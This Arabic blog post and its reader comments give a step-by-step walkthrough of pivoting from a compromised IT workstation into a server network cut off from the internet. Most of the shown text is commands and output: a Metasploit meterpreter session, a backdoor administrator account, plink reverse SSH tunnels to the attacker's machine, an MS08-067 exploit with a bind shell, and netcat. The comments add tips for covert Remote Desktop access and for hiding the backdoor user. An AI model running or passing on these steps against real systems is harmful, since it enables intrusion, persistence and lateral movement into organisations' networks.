اختراق شبكة غير متصلة بالإنترنت عن طريق الـ SSH Tunnel
الكاتب: صبري صالح | يوم: 12 أغسطس, 2010 | التعليقات: 27 | القراءات: - عدد المشاهدات 42٬301
[toc]
كثيرا ما نتحدث عن الحماية مع أشخاص تقنيين ولا يشترط كل إنسان تقني أن يكون مهتم بالحماية حتى و إن كان مهندس أنظمة أو مهندس شبكات أو كلاهما.
فعندما نبدأ الحديث عن حماية الـ Enterprise خاصة نجد الجميع يٌطَمئن نفسه بأن شبكته معزولة عن الإنترنت و أن فريق العمل محمي خلف NAT و Firewall ويظن بهذا أنه يستطيع أن يستريح من عناء إنشاء تلك الشبكة الرائعة و الأمنة (في نظره). موضوعنا اليوم هو إثبات خطأ هؤلاء و خطورة هذا التفكير على الشركات و خاصة المتوسطة و الكبيرة الحجم.
مقدمة
كما ذكرنا أنفا أن عزل الشبكات عن الإنترنت لا يعني أنها آمنة و أنه لن يستطيع أن يصل إليها أحد عبر الإنترنت.
سيكون بطل المهمة هو استعمال تقنية النفق عن طريق الـ SSH أو SSH Tunnels . سنرى في هذا التكنيك كم هو رائع و خطير عند استخدامه لأغراض أخرى.
إليكم رسمة الشبكة التي سنخترقها اليوم.
أعتقد وضع هذه الشبكة موجود أو حتى ما يشاببه أو قريب منه جدا و بكثرة ,,
الشبكة 10.0.0.0/8: سنفترض أنها الإنترنت أو الشبكة الخرجية, و هي مكان الخطر المعروف
الشبكة 192.168.28.0/24: هي شبكة الموظفين في الشركة وهم قسم الـ IT و يستطيعون الوصول للإنترنت, لكنهم خلف Firewall/NAT
الشبكة 172.16.0.0/16: هي شبكة الخوادم وهي الشبكة المعزولة عن الإنترنت تماما.
جهاز أحد موظفين الـ IT: يمتلك كرتين شبكة و يستطيع الوصول إلى الإنترنت , يظهر ذلك من عملية الـ ping
صورة من أحد السيرفرات: له كرت شبكة واحد متصل بالشبكة المعزولة عن الإنترنت
بداية المهمة ! , التسلل إلى الداخل
و بطريقة أو أخرى استطعنا أن نخترق جهاز أحد موظفين الـ IT (هنا تكمن قوة جمع المعلومات و الاستفادة منها و التلاعب بالهندسة الاجتماعية العكسية)
سنفترض أننا اخترقنا جهازه -والذي له اتصال بالانترنت- بأي نوع من أنواع الاختراق و لنفترض أنه Client Side Attack عن طريقة ثغرة متصفح الـ IE و هي aurora و كان الـ payload هو meterpreter و استخدمنا منه الاتصال العكسي reverse_tcp.
ملاحظة: يفضل أن تقوم بنقل الـpayload إلى أي خدمة/عملية مضمونة لأن الضحية قد يغلق المتصفح و نخسر الاتصال به.
meterpreter > ps Process list ============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System x86 0 NT AUTHORITY\SYSTEM 684 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 792 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 816 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 868 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 880 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 1040 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 1112 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe 1404 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1524 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe 1684 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe 1832 explorer.exe x86 0 NOT_SECURE\vm-user C:\WINDOWS\Explorer.EXE 200 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 440 VMwareTray.exe x86 0 NOT_SECURE\vm-user C:\Program Files\VMware\VMware Tools\VMwareTray.exe 448 VMwareUser.exe x86 0 NOT_SECURE\vm-user C:\Program Files\VMware\VMware Tools\VMwareUser.exe 492 afsloader.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Ability FTP Server\afsloader.exe 532 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe 596 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe 676 VMwareService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMwareService.exe 756 afsmain.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Ability FTP Server\afsmain.exe 1380 afsmain.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Ability FTP Server\afsmain.exe 1912 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe 3228 wscntfy.exe x86 0 NOT_SECURE\vm-user C:\WINDOWS\system32\wscntfy.exe 1252 rundll32.exe x86 0 NOT_SECURE\vm-user C:\WINDOWS\system32\rundll32.exe
meterpreter > migrate 1832 [*] Migrating to 1832... [*] Migration completed successfully.
رائع,,
تأمين الطريق و مد الأنفاق!!
سنقوم الأن برفع ملف plink.exe إلى جهاز الضحية حيث Plink هو البرنامج الذي سنستخدمه لإنشاء النفق بيننا وبين جهاز الـ IT
meterpreter > upload /media/ZONE/Security-Zone/Tools-Zone/plink.exe -> c:\\windows\ [*] uploading : /media/ZONE/Security-Zone/Tools-Zone/plink.exe -> c:\windows\ [*] uploaded : /media/ZONE/Security-Zone/Tools-Zone/plink.exe -> c:\windows\\plink.exe
ثم نقوم بالحصول على على shell / سطر الأوامر على جهاز الضحية
ملاحظة: أعتدت أن أنشئ مستخدم بصلاحيات المدير على أي جهاز أقوم باختراقه و هذه طريقة من عدة طرق أتبعها لضمان العودة بطريقة أو بأخرى.
C:\Documents and Settings\vm-user>net user KING sec4ar /add net user KING sec4ar /add The command completed successfully. C:\Documents and Settings\vm-user>net localgroup administrators KING /add net localgroup administrators KING /add The command completed successfully. C:\Documents and Settings\vm-user>
التعامل مع الأنفاق
حتى الأن لم أدخل في موضوعي!! ,,
إذن لنبدأ ..
قاعدة هامة: كل منفذ تريد أن تتصل به على جهاز الضحية يجب أن تنشئ له نفق خاص و يكون موجه لذلك المنفذ
أولا أريد أن أحصل (مثلا) على Remote Desktop على جهاز الضحية عن طريقة إنشاء نفق لكي أستطيع تجاوز الـFirewall/NAT الذي بيني و بينه والذي يمنعني من عمل اتصال مباشر من جهازي إلى جهازه.. لا تنسى أن اتصالنا السابق كان اتصال عكسي.
الأن جاء دور البرنامج الذي رفعناه على جهاز الصحية “Plink” , سأكتب الأمر ثم أشرحه
plink -l root -pw 123123 -C -R 3389:127.0.0.1:3389 10.0.0.100
القاعدة من الأمر السابق هي:
plink -l LUSER -pw PASSWORD -C -R LPORT:127.0.0.1:RPORT Attacking-Machine's_IP
حيث
plink: البرنامج الذي سيقوم بإنشاء النفق
-l : سندخل إسم المستخدم لجهازنا و في مثالنا كان الـ root
-pw: كلمة مرور المستخدم و في مثالنا 123123
-R: تعني Remote Tunnel
لنشرح تفاصيل الأمر من الرسمة التالية
1: هو العنوان الداخلي لجهاز الضحية, أي الـ Loopback
2: هو المنفذ الخاص بجهاز الضحية و الذي سنتصل به, و هنا نريد أن نتصل RDC إذن نستخدم البورت 3389.
3: هو المنفذ الخاص بجهازنا و أنا اخترت أن يكون 3389 و بالطبع تستطيع تغييره
4: هو عنوان جهازنا الخارجي الخارجي الـ public و بالطبع تعرفون كيف تعملون عملية الـ Port redirection من أجهزة الـ modem خاصتكم.
الناتج
C:\Documents and Settings\vm-user>plink -l root -pw 123123 -C -R 3389:127.0.0.1:3389 10.0.0.100 plink -l root -pw 123456 -C -R 3389:127.0.0.1:3389 10.0.0.100 The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is. The server's rsa2 key fingerprint is: ssh-rsa 2048 09:38:a7:fc:d8:52:3b:c0:1c:11:df:1e:83:98:b1:db If you trust this host, enter "y" to add the key to PuTTY's cache and carry on connecting. If you want to carry on connecting just once, without adding the key to the cache, enter "n". If you do not trust this host, press Return to abandon the connection. Store key in cache? (y/n) y
– للتأكد من أن النفق تم إنشاءه بشكل صحيح, سنعرض الاتصالات الموجودة على جهازنا
netnetstat -nlpt
netstat -nlpt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1051/rpcbind
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1339/sshd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 1151/cupsd
tcp 0 0 127.0.0.1:3389 0.0.0.0:* LISTEN 30480/7
tcp 0 0 0.0.0.0:37325 0.0.0.0:* LISTEN 1104/rpc.statd
لاحظ الاتصال المنصت
tcp 0 0 127.0.0.1:3389 0.0.0.0:* LISTEN 30480/7
رائع , تم إنشاء النفق بشكل صحيح ,,
– الأن سنجرب الاتصال بجهاز الضحية عن طريق الـ Remote Desktop, على عنواننا الداخلي 172.0.0.1
تستطيع أن تستخدم أي برنامج (rdesktop , KRDC4), الأمر يعود إليك.
rdesktop 127.0.0.1 -g 800×600
الشكل الخارجي لما عملناه هو
تذكير: الخطوة السابق (الاتصال Remote Desktop): ليس شرطا فقد كانت لاختبار فعالية النفق. لكن الشرط هو إنشاء النفق نفسه لكي ننفذ بقية مهمتنا.
الزحف إلى العمق
الأن لنتعمق أكثر و هو محور موضعنا ,,
نريد أن نخترق جهاز في الشبكة التي لا تصل إلى الإنترنت أصلا(172.16.0.0/16), و التي يستطيع أن يصل إليها جهاز الضحية(192.168.28.128).
أي أننا سنحول كل البيانات المتجهة إلى الشبكة الداخلية الغير متصلة بالإنترنت عبر جهاز ضحيتنا
– الأن نغلق الـremote Desktop
– و نخرج من الـنفق
exit
– ثم نخرج من سطر أوامر الضحية أي نخرج من الشيل
exit
سنعود الأن إلى سطرا أوامر الـ Meterpreter
الأن سننفذ الأمر الذي سيحول كل البيانات الصادرة من جهازنا إلى الجهاز الغير متصل بالأنترنت عبر جهاز ضحيتنا الأولى
meterpreter> execute -f "plink -l root -pw 123123 -R 445:172.16.0.7:445 10.0.0.100" Process 3520 created.
الأمر هنا هو نفس فكرة الأمر السابق إلا أننا استبدلنا الـ localhost أو الـ 127.0.0.1 بـ عنوان الجهاز الأخر (172.16.0.7) و الذي لا يصل إلى الإنترنت
ملاحظة: إذا تبادر إلى ذهنك كيف عرفنا عنوان الجهاز الأخر , فأجيب و أقول تستطيع استبدال اتصالك بالـ Remote Desktop بـأن تقوم بعملية scan و هذا استغلال أخر لوجود النفق
للتأكد من أن النفق تم إنشاءه بشكل صحيح, سنعرض الاتصالات الموجودة على جهازنا
netstat -nlpt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1051/rpcbind
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1339/sshd
tcp 0 0 127.0.0.1:445 0.0.0.0:* LISTEN 1151/5
tcp 0 0 0.0.0.0:37325 0.0.0.0:* LISTEN 1104/rpc.statd
الأن سنقوم بعملية مسح على منافذ الجهاز 172.16.0.7 و التي تمر كل بيناتا إليه عن طريق الضحية الأولى”192.168.28.128″ فيها بسبب النفق الجديد و أصبح هو الـ loopback لجهازنا , سأبدأ بفحص خدمة الـ smb عليه.
nmap --script smb-check-vulns.nse 127.0.0.1 -p 445 Starting Nmap 5.21 ( http://nmap.org ) at 2010-08-10 22:26 AST Stats: 0:00:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE: Active NSE Script Threads: 1 (1 waiting) NSE Timing: About 0.00% done NSE: Script Scanning completed. Nmap scan report for localhost (127.0.0.1) Host is up (0.000088s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-check-vulns: | MS08-067: LIKELY VULNERABLE (host stopped responding) | Conficker: Likely CLEAN | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run) |_ SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run) Nmap done: 1 IP address (1 host up) scanned in 50.71 seconds
رائع ,, الخدمة تعمل عليه و المنفذ مفتوح و كما رأينا من عملية المسح أنه مصاب بالثغرة “MS08-067”
هيا لنطبق عليه هذه الثغرة, أيضا سنستخدم الـ Payload نوعه bind_tcp و سنجعل الـ RHOST هو الـ loopbak خاصتنا أي 127.0.0.1
لنرى هل سينجح في التطبيق أم لا,,
./msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/shell/bind_tcp LPORT=7777 RHOST=127.0.0.1 TARGET=3 E [*] Please wait while we load the module tree... [*] Started bind handler [*] Attempting to trigger the vulnerability...
رأينا أنه تم تنفيذ العملية بنجاح لكن ,, أين الـ shell الذي يطمح إليه أي مخترق ؟!؟
سنرى الأن ,,
لقد قمنا فعلا بالوصول و يفترض أن جهاز الضحية ينصت الأن إلى المنفذ 7777 . ما يجب عمله الأن هو إنشاء نفق جديد إلى جهاز الضحية الجديدة عبر الضحية الأولى ولكن المنفذ سيتغير من 445 إلى 7777 .
هيا بسرعة ,,
نذهب إلى الـ meterpreter المتصل بجهاز الضحية الأولى(192.168.28.128) و ننفذ التالي
execute -f "plink -l root -pw 123123 -R 7777:172.16.0.7:7777 10.0.0.100"
و كعادتنا سنتأكد من إنشاء النفق بشكل صحيح
netstat -nlpt Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1051/rpcbind tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1339/sshd tcp 0 0 127.0.0.1:445 0.0.0.0:* LISTEN 1151/5 tcp 0 0 127.0.0.1:7777 0.0.0.0:* LISTEN 2009/11 tcp 0 0 0.0.0.0:37325 0.0.0.0:* LISTEN 1104/rpc.statd tcp 0 0 :::111 :::* LISTEN 1051/rpcbind tcp 0 0 :::22 :::* LISTEN 1339/sshd tcp 0 0 ::1:445 :::* LISTEN 1151/5 tcp 0 0 ::1:7777 :::* LISTEN 2009/11
كما ذكرنا أن الضحية الجديدة الأن تنصت على المنفذ 7777 على أحر من الجمر 😀
– لنتصل بها الأن عن طريق الـ Netcat , طبعا الاتصال سيكون على 127.0.0.1 عبر النفق
nc -v 127.0.0.1 7777 Connection to 127.0.0.1 7777 port [tcp/cbt] succeeded!
و الشكل الخارجي لما عملناه سابقا لنصل إلى الشبكة الثانية
حتى هنا ,, أكون قد أنهيت شرحي و رمضان كريم و نتمنى لكم اختراقا شهيا 😉
المهندس صبري صالح. مهندس حماية شبكات و أنظمة و فحصها معالجة و تحليل الأحداث الأمنية و المسؤول عن تطبيق معايير الـ ISO 27001 , يعمل في بيئات متعددة المنصات. حاصل على عدة شهادات تقنية.
التعليقات:
اترك تعليقاً | عدد التعليقات: (27)
موضوع جميل أخ صبري , قد لا ألم بكافة جوانبه ( في الوقت الراهن)
بالنسبة للأشكال الخارجية , عند توضيح الإتصالات , الDesired Connection , هي عكسية أليست كذلك ؟
جزاك الله خير على وقتك وجهدك . وبارك بعلمك ,,,
دمت بود ,,
حياك الله أخوي مصطفى
أخي الاتصال العكسي الوحيد في هذه المهمة هو الاتصال الأولى الذي الخترقنا به جهاز الـ IT لتسهيل الأمر اعتبر أنه صديقك أو أعطيته صفحة ملغومة بأي برنامج مثل (befrost,Skynet,etc) فالذي يحصل هو أن الجهاز هو الذي يتصل بكل لكي نهرب من الـ NAT أو الفايروول في البداية بعدها كل الاتصالات موجهة من جهازنا إلى أجهزة الضحايا.
كنا قديما لا نحتاج إلى الاتصال العكسي لأن أغلب الناس تستخدم الاتصال بالهاتف Dialup و لم يكن الناس تستخدم جدران نارية و قليل جدا من عندهم DSL في المنزل أو حتى كنا لا نعرفه 😀
لا تترد في طرح أي سؤال أخر و أنصحك أن تكبر الصور و تتمعن فيها جيدا لتساعدك الأسهم على فهم الموضوع
بالمناسبة الموضوع قد يحتاج إلى قراءة أكثر من مرة للفهم وعدم فهمك للموضوع من أول مرة لا يعيب فيك نهائيا.
أخ صبري ..
موضوع مفيد و رائع .. وأنا اتفق معك …
ال NAT هي فعليا ليست من وسائل الحماية .. هي أقرب إلى طريقة لإدارة الشبكة وعزلها..وسؤالي .. كيف يمكن تجنب هذه الطريقة ومنعها ؟
بالنسبة لي أجد الحل:
1- توعية الموظفين عن الهندسة الاجتماعية.
2- تحديث الانظمة سواء الويندوز أو اليونكس أو حتى الانترنت اكسبلورر.
3- إغلاق ال Services التي لا تحتاجها
4- منع ال SSH عن طريق أيقاف اي اتصال SSH من الخارج إلى الداخل .. أو على الاقل تحديد IPs معينة فقط يمكنها الدخول عن طريق Port 22
صدقت أخوي سامر ,, الـ NAT ليس للحماية ولم يبتكروه للحماية من الأساس بل لتوفير العناوين
بالنسبة للنقاط التي تفضلت بها :
(1- توعية الموظفين عن الهندسة الاجتماعية)
مهمة جدا جدا جدا
(2- تحديث الانظمة سواء الويندوز أو اليونكس أو حتى الانترنت اكسبلورر.
3- إغلاق ال Services التي لا تحتاجها)
عمل الـ Hardening لأي نظام موجود في الشبكة هو شئ أساسي و أتفق معك جدا.
(4- منع ال SSH عن طريق أيقاف اي اتصال SSH من الخارج إلى الداخل .. أو على الاقل تحديد IPs معينة فقط يمكنها الدخول عن طريق Port 22)
في هذه النقطة ,, لن تحل المشكلة لأنك قلت port22 فماذا لو كان الاتصال بـssh على منفذ مختلف؟
أيضا في موضوعنا النفق يتم من جهاز الضحية إلى جهازنا يعني نفق من جهازه إلى جهازنا ولهذا احتجنا إلى كلمة مرور الرووت لجهازنا
كثير من الناس تقوم بعمل DROP للـ Input و للـ Froward و تترك الـ output مفتوح.
بصراحة أخوي الجدار الناري ليس دوما الحل قد يكون وجود الـ IPS شئ مهم ولكنه أيضا خطر لأنه قد يُستخدم لحجب الخدمة 🙁
كما أتفقنا سويا , فكما أنا الاختراق لا يأتي بطريقة واحدة فإن الحماية لا تتم بطريقة واحدة
ننتظر حلول من الإخوة
شرفني مرورك
تحياتي واحترامي
سلمت يداك أخي صبري على الموضوع والشرح التفصيلي … أعتقد بعد هذا الشرح لن يجد أحد صعوبة في إنشاء نفق والتعامل معه، لانك ذكرت 3 أمثلة مختلفة تقريباً …
ألف شكر يا بطل، ورمضان مبارك عليك وعلى الجميع إن شاء الله …
للتو رأيت نقاشكم “صبري وسامر” وأحب أضيف بإنه حتى ولو قمت بإستعمال جدار ناري مغلق المخارج OUTPUT = DROP فلو وجد منفذ واحد فقط فيه مفتوح يمكن إستغلاله وسبق وشرحت أنا هذا في أحد المواضيع تجدونا يمكن في هذين الموضوعين:
http://www.binary-zone.com/2009/01/27/bypass-company-firewall-using-http-tunnels/
http://www.binary-zone.com/2008/09/30/bypass-isp-blocked-ports/
أي مخترق سيحتاج الى منفذ واحد فقط ليخرج منه وهذا يكفي ليمرر جميع بياناته من خلال ذلك المنفذ … صراحة الحلول هنا أتوقع محصورة في أنظمة تحليل الحزم ولا أقصد هنا Packet Filtering بل أقصد إستعمال نظام أو جهاز لديه قابلة عمل Packet Inspection … طبعاً مع وجود نظام IPS يقوم بإتخاذ اللازم بشكل سريع ويوقف أي تلاعب يراه على الخط …
ننتظر أفكار أخرى 🙂
رااائع …
اخي العزيز ,,,,
شكرا علي الشرح الجد رائع.
و لكن عندي سؤال بالنسبة للامر plink او بمعني اصح الاداءة plink
حاولت ان اجربها طبعا استعمل سيناريو شبيه بالدي عملته:
عملت اتصال عكسي باستخدام الاداة netcat و نفدت plink انظر الي النتائج:
plink -l root -pw awardsw -C -R 3389:127.0.0.1:3389 192.168.0.225
plink -l root -pw awardsw -C -R 3389:127.0.0.1:3389 192.168.0.225
FATAL ERROR: Network error: Connection refused
ارجوا الايضاح طبعا جهاز الضحية ويندوز اكس بي و المهاجم backtrack 4
السلام عليكم ,,,
بعد عدة محاولات و تغيير الخطة باستخدام جهازين ويندوز اكس بي (الضحية و المهاجم).
وعند طلب الريموت ديسكتوب للايبي 127.0.0.1 يفتح عندي جهاز المهاجم (win XP ) ؟؟؟؟!!!!!
عليكم السلام ورحمة الله,,
أعتقد أن سبب المشكلة الأولى
FATAL ERROR: Network error: Connection refused
هو أن هناك اتصال موجود على الـ remote Desktop على جهاز الضحية. لهذا لن تسمح لك الخدمه باستخدامها مرتين (هذا في الـ XP,Vista,Win7) أم في السيرفرات ممكن يأتي بحد أقصى اتصالين في آن واحد و تستطيع التلاعب في هذا الأمر و تزود عندد الاتصالات.
أنا لم أجرب الموضوع عندما يكون جهاز المهاجم Windows بصراحة كل تجارب الاختراق أستخدم فيها Linux في شرحي للموضوع كان جهاز المخترق Fedora 12 و جهاز الضحية كان XPsp2
أيضا لا تنسى أن تفعل خدم الـ Remote Desktop على جهاز الضحية
سأحاول أن أكون معاك حتى تحل مشكلتك
مشكور اخي علي بادرتك الطيبة في مساعدتي.
1- اريد ان اوضح ان المشكلة الاولي كان حلها بعمل SSH Server عند جهاز المهاجم لهذا السبب نتج هذا الخطاء:
FATAL ERROR: Network error: Connection refused
2- المشكلة الثانية انه جهاز الضحية WinXP و المهاجم WinServer2003 طبعا نزلت فيه OpenSSH وكل شئ تمام لكن عند طلب Remote DeskTop علي LoopBack يفتح عندي WinServer2003 ما يفتح جهاز الضحية معي (WinXP) ارجوا ان تكون الامور واضحة لديك.
[…] This post was mentioned on Twitter by Abdurrahman Alblowi, Security 4 Arabs. Security 4 Arabs said: اختراق شبكة غير متصلة بالإنترنت عن طريق الـ SSH Tunnel http://bit.ly/9HJECt […]
بارك الله فيك أخي,,
حسنا ما رأيك أن نغير منفذ الـ RDP لجهاز المُخترق ؟!
http://support.microsoft.com/kb/306759
رابط أخر
http://www.onlinehowto.net/Tutorials/Windows-XP/Change-Windows-remote-desktop-port-number/291
الصراحة فكرة عبقرية جدأأأأأأأأأأأأأأأأأ
لانه الامور مشيت تمام غيرت المنفذ من 3389 الي 3388 و عملت في الريموت :
127.0.0.1:3388
تحصلت علي ويندوز اكس بي.
بارك الله فيك ياخوي وانشاء الله ربي يزيدك علماً….
سلااااااااااااااام…
خلاصة الموضوع :
1- عندما يكون جهاز المهاجم باك تراك و الضحية و يندوز الامور تمشي تمام.
2- عندما يكون كل من المهاجم و الضحية ويندوز يجب تغيير منفذ الريموت عند الضحية.
ولكن عندي شؤال :
1-كيف ممكن تغيير منفذ الريموت دسكتوب من جهاز المهاجم؟
2-كيف من الممكن انه يتم عمل الريموت من غير ان يلاحظ الضحية بمعني اخر عدم ظهور الرسالة تخبره بان هناك المستخدم xxxx يريد عمل ريموت؟
الحمدلله , بعد ما فهمت مشكلتك تأكدت أنه سيكون الحل ,, لأني لا أستخدم إلا في أقل القليل على مستوى تعاملي كله.
1-كيف ممكن تغيير منفذ الريموت ديسك توب من جهاز المهاجم؟
من الـ Registry لكن المشكلة لو غيرته فلن يستطيع هو الدخول على النظام بالـ Remote لأنه لا يعرف البورت 😀
2-كيف من الممكن انه يتم عمل الريموت من غير ان يلاحظ الضحية بمعني اخر عدم ظهور الرسالة تخبره بان هناك المستخدم xxxx يريد عمل ريموت؟
لو كان على windows server فلن يحصل هذا معه لأن بشكل افتراضي يسمح بواحد على الجهاز الفيزيائي و إثنين عن طريق الـ Remote Desktop
كانت هناك طريقة أعملها قديما على XP أزود عدد الـ Remote Desktop Sessions لكن نسيتها لأنها من عمر طويل لكن ابحث عنها ستجدها هي كانت الفكرة بتغيير ملف معين و استبداله بملف windows Server
تحياتي و احترامي
السلام عليكم …
اخوي كلامك صحيح 100% بس ممكن اني اغير منفذ الريموت و بعد ما اخلص شغل ارجعها ثاني.
سلااااااااااااام
اخي الكريم صبري …
اريد منك المشورة اذا سمحت ماهي افضل البرامج المستخدمة في هذه العملية والمتطورة في هذه الفترة لكي اصل لنتيجة رائعة وسهله …؟
أشكرك على كل الأحوال
أخوي البرنس بصراحة ما فهمت سؤالك
سامحني ياخوي و أعد صياغة السؤال لو سمحتلي
عندنا فى العمل اجهزة كثيرة مربوطة بنظام الدومين ولا نستطيع تغيير اى اعداد من اعدادات الجهاز الا بعد الرجوع للادارة فى القاهرة وتقوم الادارة بالدخول على الاجهزة من خلال ال IP والسؤال هو هل يمكننا تغيير اى اعداد من الاعدادات مثل تغيير الطابعة او اللغة او ربط جهزى بطابعة اخرى فى حالة نعطل الطابعة المربوط بها جهازى
يا إلهي !!!! كلما تعمقت بالمدونة أحسست أني أكثر جهلا بالشبكات 🙁
وعندي مليون سؤال لكن سأكتفي بالبعض 😀
1-في مؤسستي كل جهاز IT له العنوان
10.x.x.x
و للاتصال بالسيرفرات (العمل على تطبيقات ويب) يستلزم استخدام برنامج
cisco vpn client لانشاء اتصال (لأغراض آمنية على ما أعتقد ؟؟ ) بعدها يتم اسناد IP مثل 192.168.1.1
لجهاز ال IT حتى يتمكن من الوصول ل (web app) …. ماسبب استخدام اتصال الشبكة الافتراضية ؟؟؟ لو اخترقت جهاز IT آخر ماهو ال IP الذي علي أن أعتمد عليه ؟ ؟ علما أن الشبكة هي من نوع WAN وكل مجموعة أجهزة أو سيرفرات خلف راوتر
أتمنى منك كونك خبير شبكات أن تقدم لي شرحا بسيطا عن بنية هذه الشبكة
2-أنا متصل بالانترنت , كيف لي أن أعرف اذا كان IP جهازي Real ?? علما أن الاتصال عن طريق شبكة 3g
3-بالنسبة لبرنامج SSH Tunnels لو كان هناك منفذ مفتوح بالجهاز الهدف هل يمكن استعماله بدلا من فتح منفذ جديد تجنبا لمشاكل الجدار الناري مثلا ؟؟!!
4-أنا استخدم Vmware لأغراض تجريب الاختراقات و تقليد الشبكات لكني وجدته غير مجدي في مثل هكذا حالة (اجهزة خلف راوترين على الأقل) فما البرنامج الأمثل لتقليد الشبكات
5-عذرا على الاطالة واعذرني على جهلي وتقبل خالص احترامي وتقديري
بالنسبة للأخ try to be IT
سؤالك عن
-كيف من الممكن انه يتم عمل الريموت من غير ان يلاحظ الضحية بمعني اخر عدم ظهور الرسالة تخبره بان هناك المستخدم xxxx يريد عمل ريموت؟
اليك الجواب على الصفحة التالية بأكثر من طريقة
http://fawzi.wordpress.com/2008/02/09/enabling-multiple-remote-desktop-sessions-in-windows-xp/
وهي ببساطة كما ذكر المهندس صبري باستبدال ملف termsrv.dll بآخر
واليك أداة لم اجربها بنفسي تقوم بعمل الاستبدال آليا
http://www.kood.org/files/Termiserv_XPSP2-SP3_i386_2.1.exe
وبالمرة أنصحك باخفاء اسم اليوزر الجديد الذي أنشأته كي لايظهر بشاشة تسجيل الدخول
من regedit > specialaccounts
انشئ قيمة Dword باسم المستخدم الجديد وضع قيمتها 1
سلام
[…] Click hear to read more → […]
لو كانت الشبكة تستخدم اجهزة تشفير مثل ال ASA او ال PIX هل يمكن عمل هذه الطريقه معها ؟؟؟
مهندسنا العزيز صبري انا اريد منك توضح بسيط اعرف انه سخيف ولكن ارحم جهلي 🙂 لو سمحت وضح لي هل انت بالبدايه ارسلت رابط ملغوم للضحيه واصبحت تدخل للجهاز منه؟؟ وهل الجهاز الذي اخترقت به هل عن طريق الباك تراك ام ماذا ؟؟؟ ارجوك ان تجيب عالاسئله وان تعيد بشكل مبسط جدا وسريع عن كل خطوه وخاصه مرحلة ال plink ارجو الرد يا مهندسنا الرائع
[…] Full read […]
السلام عليكم
ما شاء الله مدونه اكثر من رائع و متعوب عليها
و انا مبتدى فالشبكات و ان شاء الله استفيد من المدونه و اخرج محترف
تشكر اخي الكريم
و يعطيك العافية